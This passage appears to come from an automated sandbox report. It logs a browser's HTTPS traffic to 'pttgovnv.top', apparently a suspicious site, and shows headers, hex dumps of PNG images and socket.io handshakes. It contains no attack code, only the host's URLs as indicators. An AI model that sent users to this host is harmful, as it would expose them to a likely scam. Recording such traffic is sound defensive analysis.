          Data Ascii: \I?kM!t&kj<5,<{wYpH{hSPjV~kbV_q5kGEq{LW<qd^4Ej5*>H_nOHTLTx=eo-7|x$L=dtz6)7RQy#:L.b>{"4^5d+dB$C[;-M^TgPqVI
          2024-09-01 22:25:29 UTC1369INData Raw: b5 7d a5 a6 33 5d 25 35 82 4f 7e 9d 6f f8 3a 7b 3a 70 1c a8 28 b9 54 fb 39 33 02 e7 ce 95 78 c7 8d 70 97 f3 c8 e2 16 f1 f0 7f d4 ef 59 cf fe ad 6b b0 80 a7 84 4c 6d cd 59 85 90 9b 18 a1 f6 ab f1 7c 26 e6 bb b7 6e b5 1d 52 06 46 c4 f9 a4 ed 31 bb 72 6e bc 76 21 37 de d6 cb 40 45 db f1 b5 8a b9 b0 0f fb 10 7a 4a 03 a1 27 42 ee 5a ed b0 2f ef 47 b7 4c a0 be 0a 4d 45 dc 5d c3 67 08 1d e3 bb 2f 5f be 74 e2 42 54 68 85 a9 23 de 98 95 8f d2 88 ff 0c de 7f 5d 15 83 a5 e7 ed b9 92 74 1f 2d de 83 ef 00 67 6a 74 4e d5 6b 37 31 a3 db b1 8e d2 c7 c1 e7 5f 78 be cc c8 d3 8f 9a c7 25 d3 b2 89 f1 5e 8e ad 91 53 83 7f 6d 8c c4 49 99 b7 40 3c 90 12 af a7 d7 d7 37 9e 4a 3f fd ec bd 86 7e a4 df 6b a9 ec 3e 96 3c ff b9 7b 39 dd f7 d3 1e c4 5c 55 09 46 2f f8 cf 03 31 30 29 7b
          Data Ascii: }3]%5O~o:{:p(T93xpYkLmY|&nRF1rnv!7@EzJ'BZ/GLME]g/_tBTh#]t-gjtNk71_x%^SmI@<7J?~k><{9\UF/10){
          2024-09-01 22:25:29 UTC1369INData Raw: f5 e8 85 a5 a6 16 f1 62 f3 69 cf 40 15 67 55 d7 ec f7 76 fd d3 e7 87 73 5f a7 58 87 2d 5c e3 69 44 88 bb 40 98 f9 95 ca 7d 2b dc f5 ba cf 0b ea 03 00 c0 b1 d1 a4 ff ab 8c 87 fb f1 b7 df 4f dd cb 4c 11 4d 61 80 bd 05 ba b2 3a 55 04 82 6c 0b 75 69 57 9a ea 6a 45 11 12 92 ad ff ac a0 62 78 77 ef e9 ae 2e 5e 37 95 cf 8a 56 c9 ae 28 72 7a 15 f7 54 34 f2 f2 bb 47 88 f0 fd 1c ac f6 b4 7b 10 de bb 0a 8f 9a 0a a7 4c 05 97 7c af d7 e2 36 57 bd 12 03 64 7f e3 26 58 89 dc 77 66 0b b1 43 da ea 09 00 a0 29 2a b8 9a 2c 3e 98 d4 f8 4c 5b fb 61 c3 86 e9 d2 74 aa e7 bd 5d 8d aa b1 57 37 05 42 27 59 71 24 b2 09 32 f7 75 81 46 d2 e2 f9 44 bc 0e 23 47 5a f2 bd 53 f7 7c 13 6c f9 bc 2c 56 78 a5 8d ea 54 85 51 af 4e ae 35 5d 20 21 f7 94 6e 70 9f d2 93 82 85 29 77 41 1c 9c 3c e3
          Data Ascii: bi@gUvs_X-\iD@}+OLMa:UluiWjEbxw.^7V(rzT4G{L|6Wd&XwfC)*,>L[at]W7B'Yq$2uFD#GZS|l,VxTQN5] !np)wA<
          2024-09-01 22:25:29 UTC1369INData Raw: 7e 4b 54 ab 23 ff f7 3a 95 6a 47 ac 6f dd 72 5a c0 1f 73 b7 5c a5 9a 98 46 9f 46 62 e3 32 2f 76 d5 40 26 6a 2c 27 3a f5 3a 36 8d ec 93 4f 56 ec be 7a ca c6 26 9d cb 7d 4b 45 90 eb b5 d8 e7 10 3e db a9 b9 fe 8f 91 73 48 79 65 5d eb 54 4b 3c 67 9f 5c 64 55 b0 c6 f9 0d 4c 3d 78 ab b1 68 99 a9 d3 37 05 3f 97 96 78 9b 6e d6 bc 95 2c 18 04 b4 69 d0 4f b4 ce ed c2 53 2e b9 06 d3 c8 33 e8 b9 e5 b4 f7 59 41 a7 9e 6a bb c1 ab 50 3e 38 f3 6d f9 41 ed d2 c4 96 99 96 77 5f eb d4 45 50 2f 26 75 84 9c 0e 30 43 a1 f5 a6 60 7a 33 8f 7c 3e 6c 67 45 02 67 aa b6 f6 7a 43 e5 15 13 8b db 8a f1 ad 12 cb fd 16 7f 8b c1 cf 31 8b 38 1b 53 16 e9 ec 65 2a 6a aa 1e b6 69 a4 b3 08 2b d2 b8 4d af d2 1a f7 e4 a7 28 ff 5a 1c af bd 87 50 1b 76 62 44 e8 38 30 80 fe fd c4 2d 63 e5 52 bd b7
          Data Ascii: ~KT#:jGorZs\FFb2/v@&j,'::6OVz&}KE>sHye]TK<g\dUL=xh7?xn,iOS.3YAjP>8mAw_EP/&u0C`z3|>lgEgzC18Se*ji+M(ZPvbD80-cR


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          110192.168.2.449852104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:28 UTC361OUTGET /help/layout/images/51.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC722INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: image/png
          Content-Length: 23451
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"5b9b-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36238
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJH2Scd04Z5VPddADL2HRuT%2Fio1uyhlXQrdZhLHqiAHkwN81qNeQEHKh58yB2TTQegD2dRkoPQ3dNV1Uq8WhGbMvQbGK4WoGJ4Yzf5ne5iTHSFf7cI3ALmYBW%2F5Hb6E%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad2c7bcd5e7d-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC647INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 5b 28 49 44 41 54 78 da ec bd 7f 88 63 db 7d e0 79 ae aa c3 e6 85 81 aa c7 fc 31 ed c1 4b cb 79 0f 4c c0 d0 6a c6 2c 31 76 5c 6a 86 90 b0 93 a1 ab 5f 63 9c 64 02 a5 ee f6 1f 5e 70 e8 ea cd 06 ff 88 b3 ad 5e db f9 c1 24 69 35 09 24 7f f8 bd 52 41 c6 b1 d7 74 77 35 c9 2e 33 13 c2 53 39 0e 09 83 e1 55 91 40 30 3c fb a9 20 c4 3d 2c c1 55 30 e4 25 b8 4b 77 ef f7 ea 7b 5a 47 47 e7 4a 57 d2 55 49 aa fa 7c 40 5d 5d 2a 49 f7 de 73 af 74 3e fa 9e 73 be df 28 8e 63 03 00 00 00 00 cb 45 84 c4
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<[(IDATxc}y1KyLj,1v\j_cd^p^$i5$RAtw5.3S9U@0< =,U0%Kw{ZGGJWUI|@]]*Ist>s(cE
          2024-09-01 22:25:29 UTC1369INData Raw: 00 00 00 00 48 1c 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 12 87 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 12 07 00 00 00 00
          Data Ascii: HH qH q qHH qH q qH qH q qH qH
          2024-09-01 22:25:29 UTC1369INData Raw: e1 64 1e 5e ee 17 49 e4 6a d2 05 29 05 6c a3 f1 e2 38 56 a2 ff 3a 20 b9 22 68 51 fa 98 eb 19 02 fb e1 40 3b 7f 67 d8 62 05 8d 50 7e b3 10 b1 2a 45 4d 4f 9e 9f 27 c7 7a d8 37 d7 4e 86 f6 93 e3 63 35 ec 04 cd 4b 13 8c 2d 70 4f 97 35 2a a0 c3 53 55 4d a7 70 16 45 ae 9e fc c8 fa b6 2c 22 d7 f0 db 82 ab 7d 69 b8 96 dc 5a 0c af 16 22 4a 47 01 09 d8 59 88 7d 8b cd 17 02 f7 46 e9 9c aa 49 89 cc 2f 0d dc 77 d2 39 58 b6 d3 96 0a ce 49 fc 63 69 2b 0d 1c 63 f4 e3 99 02 1b 5a c8 d0 89 4f e5 0b 6d 3a 94 eb 4b 78 27 fe 8b e4 f6 2b 23 65 0f 90 b8 71 a4 cd 8a 8d ae da cb 92 34 f9 a6 5a 5b b2 63 2b ab b0 d4 75 df 65 c8 f1 9d e4 f7 fd 33 da 21 ca 10 f8 71 c6 df ee 38 e2 26 e7 b8 21 f3 1d cf aa d4 9e 41 2e 9b 6e 1a 19 98 4a 94 e2 3f 18 10 81 95 d2 7a da e1 cf 5f 54 0e 25 4a
          Data Ascii: d^Ij)l8V: "hQ@;gbP~*EMO'z7Nc5K-pO5*SUMpE,"}iZ"JGY}FI/w9XIci+cZOm:Kx'+#eq4Z[c+ue3!q8&!A.nJ?z_T%J
          2024-09-01 22:25:29 UTC1369INData Raw: b2 f4 8a a4 61 c9 7d 0b a5 f6 18 c5 4a 69 23 91 9f 07 7d b7 95 d2 67 52 f9 0a 17 ad 8f cd f3 ce cf 85 2a 2e 0c bc bf a4 be ea 49 67 78 ff 95 ca 5c 49 64 ee 07 53 e6 e5 1b 4c 2b 32 2c 02 1a 3a cf 2b a5 cb a4 1b 41 e2 5c 42 df ee 5d 89 73 3b 6b 89 4e 5d 71 04 6e 4d 1f 7b 30 cb e1 35 11 45 8d 6c 6d a9 30 3e b1 f5 23 93 ff df 31 81 44 a7 ba c2 f6 b2 ca d8 9a 46 a0 e4 b9 0f 9d 08 93 ec b3 bb 24 5d 7e 97 a8 dd ba 76 98 37 55 58 9a 59 fb a5 f2 2a 8f 97 f9 65 2f 27 b7 f7 e9 f3 64 7b db 9a 6b 6d 61 3a 53 3d 4f 22 02 f7 5c c9 d4 55 c8 37 73 4a 9c 31 4c 9e 9f 97 cc c9 79 c9 9b 7c b6 42 ab 4d d9 e6 69 12 59 af 83 97 0e 7d ce 09 80 83 13 df bb 92 f0 4b a3 45 22 2d e3 e4 cb c2 e7 cf c4 09 93 95 bb 27 9d bd 44 e0 de 97 47 e0 3c 91 fb 8d e0 ca df 41 99 fb cc c5 5b 8f bf
          Data Ascii: a}Ji#}gR*.Igx\IdSL+2,:+A\B]s;kN]qnM{05Elm0>#1DF$]~v7UXY*e/'d{kma:S=O"\U7sJ1Ly|BMiY}KE"-'DG<A[
          2024-09-01 22:25:29 UTC1369INData Raw: f6 75 65 5f 45 78 64 9b 07 ba bf 6d bd d9 a8 e2 22 2e 6e b0 f3 df 42 e5 b7 a4 bd f7 03 91 b5 d6 08 a1 78 21 bc 00 13 f0 a1 82 5f ef fb 85 ef e1 49 fc b9 50 67 3c d7 56 4b 73 c6 0d ec d3 a7 02 62 73 d9 7b de bb 13 0d 6d 2e 9e c8 35 06 e4 7a 56 05 e3 3b f1 bf 35 e1 a1 d5 0f 0d f9 82 f1 ab c6 4f 2b d2 3d 47 6b 63 dd 42 af 91 c8 2a 1f 1b e7 44 e2 54 42 36 6d 22 d1 8c 95 85 fb de 73 6c 02 5c bf c6 9e 44 64 36 0a de bf 35 8d 0c 6d aa 00 d9 22 f4 0f 1c 69 ac 27 3f 2b ba e8 41 de 48 6f e9 4d 24 e9 a9 23 6c 5b c6 29 e6 3e 4e 1b 89 74 e9 e2 84 86 e6 7f ab ea 9f ed 42 8b 96 8a 66 c5 11 e1 ba 6e ef b2 b6 97 1d 3e 95 c7 6c ab dc 35 17 f2 03 30 bb 8e aa 1c d7 13 2f d7 5d 6b 84 f0 1a 43 c9 27 c8 c7 5f 0e 76 76 d1 fb 27 7e b5 28 ba 1c 88 32 15 1e fd 4e 85 61 d1 ca 71 85
          Data Ascii: ue_Exdm".nBx!_IPg<VKsbs{m.5zV;5O+=GkcB*DTB6m"sl\Dd65m"i'?+AHoM$#l[)>NtBfn>l50/]kC'_vv'~(2Naq
          2024-09-01 22:25:29 UTC1369INData Raw: aa 8e a4 5d 52 79 ac 98 fe 39 6a 36 6d 88 ec e0 75 a7 60 bd 7b 5c b6 6a c2 ba e9 4d 60 3e d0 8e 6b 57 9f df f2 f7 59 87 0c 77 b5 5d 36 66 39 5f 4d 5f bb ae 73 0c 65 9b b2 da f3 45 9b 7a c7 b4 a5 1d b3 5d 48 52 55 09 6a 8d 33 4f af 00 24 cd cb 96 8a dc 96 e6 e8 6b 38 fb 55 d7 5b 28 79 71 39 70 ae 9b 7c 94 14 fe be 96 eb fe 4e 8e 87 2e fc 10 7e 9a b2 a1 14 bd 33 10 dd e8 a6 55 f8 f3 8b b7 1f 4b 49 a7 6f 9b de 64 f2 d5 e4 fe f7 9b 0b a5 97 c2 22 13 3f d7 5a a7 a7 12 f9 49 3a ff a7 49 67 bd 10 49 ae 45 24 12 d1 78 d6 27 6d 52 1a 6a 06 22 d1 df 53 96 1e 24 d7 e4 83 b1 9e 73 d2 d9 4b cb 5b cd a6 0d 8e 06 16 ba 74 d3 c0 34 02 82 f7 de ee 63 a3 db c9 6f b7 d3 eb 2d 36 7f 9f 5c 47 7f 97 eb 7a eb 5e c3 f7 03 42 35 98 56 a4 c8 1a b5 b2 1a 77 25 dd 67 f7 18 3f 3c c6
          Data Ascii: ]Ry9j6mu`{\jM`>kWYw]6f9_M_seEz]HRUj3O$k8U[(yq9p|N.~3UKIod"?ZI:IgIE$x'mRj"S$sK[t4co-6\Gz^B5Vw%g?<
          2024-09-01 22:25:29 UTC1369INData Raw: 24 0a 3e c8 29 70 65 a7 23 2a 6b 0a 10 4b 6b 8e 6d bf a5 92 74 49 25 76 3f 23 32 63 4c 2f df dd 6c a3 21 dd c5 24 6e 69 99 b4 26 ac 4d 19 a2 fb 58 f3 a2 45 15 3e 32 16 06 44 0b 00 90 b8 33 7a 5c 7e 67 7b df 89 cc 85 04 ee d8 2c c0 fc 1a 8d 0e 5d 56 71 d8 d7 9b 4d 35 92 07 2b 80 36 d2 57 d5 ce 6e 6f 9e 13 c0 9d e4 ba 69 4d 5a 6f 81 c0 9a 23 51 a7 5d 22 c7 17 6a d9 87 17 ab 6a 55 f4 1e 3a fb bb c6 47 c6 42 b0 77 ca 29 69 00 00 90 b8 53 c4 ed 6c 8f 9c e1 b9 90 c0 a5 f2 b3 08 b5 3f 55 1a 5e 4e 6e 32 d7 e3 48 65 ae 96 47 c0 54 00 65 78 ac a6 bf cb f3 65 e8 af 6d 16 a0 b2 80 9d 23 a7 6d 5f 77 fe 54 73 16 34 34 75 df 5b 7a df ac 23 5f b6 06 ad 4b 5a 41 c3 29 7a 5f e7 63 62 a1 38 1e e3 4b 0d 00 00 12 b7 e4 6c 8d 10 b8 e3 39 76 d4 d5 0c d9 91 08 5c d9 68 79 ad 1c
          Data Ascii: $>)pe#*kKkmtI%v?#2cL/l!$ni&MXE>2D3z\~g{,]VqM5+6WnoiMZo#Q]"jjU:GBw)iSl?U^Nn2HeGTexem#m_wTs44u[z#_KZA)z_cb8Kl9v\hy
          2024-09-01 22:25:29 UTC1369INData Raw: 96 de da ce 7e 58 01 a9 eb 36 5a c3 d2 34 e8 bc c0 0d 33 5e d4 6a 16 12 77 cf 69 9f 07 ba 3f 5b 7a cc 65 3d 9f 0d 15 d3 a7 fa 58 29 2b b6 1b 90 35 1b 99 1d 67 a5 a8 b4 e1 ba 5c 1b 56 06 75 a5 ec 7d 67 df b6 bd 6d 18 ef 4b 01 00 00 c0 a9 b1 8c 73 e2 56 43 9d a6 76 bc 76 08 ee 8f 4d ff ea c2 9a 23 2d b6 ce a8 99 26 07 95 4a d2 1d 95 b3 a7 2a 62 6b 2a 97 7b 8e 54 c8 ef 07 2a 96 92 fb aa a1 f3 f2 64 c8 53 e6 a4 95 75 91 c1 55 15 18 1b 95 12 09 79 d3 11 c0 9b 2a 33 0f 1d f1 b1 d1 b6 3b 76 9f 9c f9 63 4d 6d 8f 5a 68 92 bf 44 8e 92 9b 3c e6 1d 6d ab d6 1c cf a9 bb 6d 69 af 63 1d 8e ac a8 84 1e e9 b9 aa 6a 5b 54 f5 b1 65 3d de 7d 6f 61 c6 91 3e 6e 1c b1 6a eb cf 86 77 5d d5 1d 01 b7 1c 07 2a 7d 6c 78 c7 00 00 00 30 53 2e 2c f1 be 5f 0a a4 d2 68 aa d0 fc 0b e7 be
          Data Ascii: ~X6Z43^jwi?[ze=X)+5g\Vu}gmKsVCvvM#-&J*bk*{T*dSuUy*3;vcMmZhD<mmicj[Te=}oa>njw]*}lx0S.,_h
          2024-09-01 22:25:29 UTC1369INData Raw: da 72 3a 5c b7 83 ba 54 40 47 2b 72 22 73 a5 6c 25 86 9a d3 f1 c9 82 02 3b e1 fe c8 d9 d7 8a 3e ef a1 15 b9 e4 f9 15 dd af aa e9 2d 5e d8 74 3b 51 27 41 f0 91 23 77 2d 1b 65 72 16 34 dc 0b 88 48 db 3e c7 95 26 ad 24 61 73 ce 55 4d 6f 5e df ae 0e 4b 37 27 14 00 7b 1c f6 75 fd b6 7e 53 7f d6 cc f0 f9 6e 6b 3a 57 f0 40 db a2 62 7a 79 e3 ac c0 35 1d 79 92 c8 98 54 6a 78 cb 91 d5 69 86 f0 5a 9e c4 a5 95 2f 74 85 aa bd a6 aa ce 71 d7 02 c7 6a 96 6d 3e 98 9e bf 59 25 7b be ac 5f 76 6a 7c dc 26 9c 74 dc b9 b8 ab 89 f0 94 13 01 f8 9f 86 8a cf 4a a9 92 88 d4 af 8f 9a ab 96 0a 5c 29 7a 25 53 91 3a f1 77 65 ce 5b f2 bf 7d 1b 5d 4b e5 24 4a ae 79 3b 67 2e 5b 24 ff bf 91 db bf f9 e8 cb c9 63 d7 82 db 3e e9 1c 24 ff ca 17 ac 74 31 43 3a dc 6b cc 07 93 57 df 48 b6 fb bf
          Data Ascii: r:\T@G+r"sl%;>-^t;Q'A#w-er4H>&$asUMo^K7'{u~Snk:W@bzy5yTjxiZ/tqjm>Y%{_vj|&tJ\)z%S:we[}]K$Jy;g.[$c>$t1C:kWH
          2024-09-01 22:25:29 UTC1369INData Raw: 72 ed 56 83 b8 a7 51 33 a3 bf ef 99 8c d5 a9 4e c4 6f df 89 28 da 39 77 76 61 87 9b e4 b8 66 7a 39 dc 5a 33 b8 b6 42 43 c9 ee 97 84 ac 72 5e 87 4b b6 a8 a1 36 e6 e3 ed 17 96 7d 15 f1 b2 09 0f 29 67 71 6d 54 12 6c b0 a2 10 ff 75 e2 0e a3 57 99 96 a2 4f 85 9e 2d 73 e0 a6 14 c9 43 49 6f 22 8b 1a 3c 91 7c 29 77 b4 a9 fb d8 e5 4e bd d1 95 56 57 6e 8f ec f1 a4 b2 7d fb f1 76 df d0 77 37 dd c8 25 2a 51 00 12 37 be c4 85 be e9 57 27 8d 94 a8 80 dc b3 02 a7 72 51 b6 b2 a1 f5 3c 67 d6 61 eb 50 a4 1d 1e b5 c2 64 4c 6f d5 e6 86 6e df 0e 59 4a 48 ae a2 c3 bc 2f e4 cd 0c 26 3c f6 65 b1 a2 af 2f 11 b4 3b 1a 35 6b 99 de 2a 57 63 7a c3 c5 55 a7 d3 16 99 6c 7a 79 ee 8e 54 7c 6d 79 30 5b da cb 98 e1 e9 45 6c 24 c1 6e 53 8e d5 ae f2 b5 c3 b5 56 ac ee ab 30 ca 7d 4f 8b 16 02
          Data Ascii: rVQ3No(9wvafz9Z3BCr^K6})gqmTluWO-sCIo"<|)wNVWn}vw7%*Q7W'rQ<gaPdLonYJH/&<e/;5k*WczUlzyT|my0[El$nSV0}O


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          111192.168.2.449856104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:29 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMdd&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC607INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n48yMKEMJ26YlsB%2BZSIQCboLz9CPfsb%2FxCjNarjBI9hv8Qo%2Ffc5wMFTIKFph1ZOy38ahbFJLqFmSJR6GjPEGiBPLXUfpEdcJSTzNWX2GdqhJS%2FZxdJL%2FhtCb7IIR9io%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad2cbe338cb1-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:29 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          112192.168.2.449857172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:29 UTC554OUTGET /socket.io/?EIO=4&transport=polling&t=P6liNBO HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC629INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6MHBG%2F1LYQ6IwX3Iu%2FWlgy2JKbZps5k64W%2FMmBLq%2BcHVKkruhZWqPxwFT5BdNJyIcxERhjyD7JlgnzkDlQPlbeM6lkE%2BEXsa8hMFKOuzpCvWC5%2BtRsk%2BNPa1Q4MeFU%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad309a638c24-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 59 41 44 42 53 52 79 39 79 54 63 35 4a 7a 64 39 42 51 55 49 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"YADBSRy9yTc5Jzd9BQUI","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          113192.168.2.449858104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:29 UTC361OUTGET /help/layout/images/54.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC732INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: image/png
          Content-Length: 62332
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"f37c-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36238
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94JzsGWGg%2B5nqGFAQnpn1ZfOKr19V3Gp%2BJ1god%2FEHtjL7bVYbnj4apIu0Zty1CUTh9LdBLUPvMIvohtpI9P5PwbpOftbyoTQV%2F3Usx%2BFw2JF3WucOW9tMG%2Bldd%2BbRRc%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad311f1743be-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC637INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 f3 09 49 44 41 54 78 da ec 7d 07 98 5b c5 d5 f6 51 97 56 5a 69 7b ef 5e af 7b c7 15 57 6c aa e9 10 20 a1 27 24 21 05 02 04 7e c2 47 42 49 e0 4b a3 a5 00 5f 1a 21 09 bd 84 de 12 c0 06 8c b1 8d 8d 0b d8 06 b7 ed bd 57 75 e9 9f 33 77 46 ba 2b ef 7a b5 5e 6d f1 fa bc cf 23 6b 35 be ba f7 6a e6 dc 99 77 4e d5 04 83 41 20 10 08 04 02 81 40 20 1c 5b d0 52 17 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 12 47 20 10 08 04 02
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATx}[QVZi{^{Wl '$!~GBIK_!Wu3wF+z^m#k5jwNA @ [R@ #@ #@ #@ G
          2024-09-01 22:25:29 UTC1369INData Raw: 22 71 04 02 81 40 20 10 08 04 22 71 04 02 81 40 20 10 08 44 e2 08 04 02 81 40 20 10 08 44 e2 08 04 02 81 40 20 10 08 44 e2 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 12 47 20 10 08 04 02 81 40 20 12 47 20 10 08 04 02 81 40 20 12 47 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 e1 d8 84 9e ba 80 10 09 83 d9 ac 61 6f 1a f1 51 23 c8 be 26 e2 b0 20 7b 05 c4 7b d0 eb 72 05 a9 e7 08 04 02 81 40 18 39 68 82 41 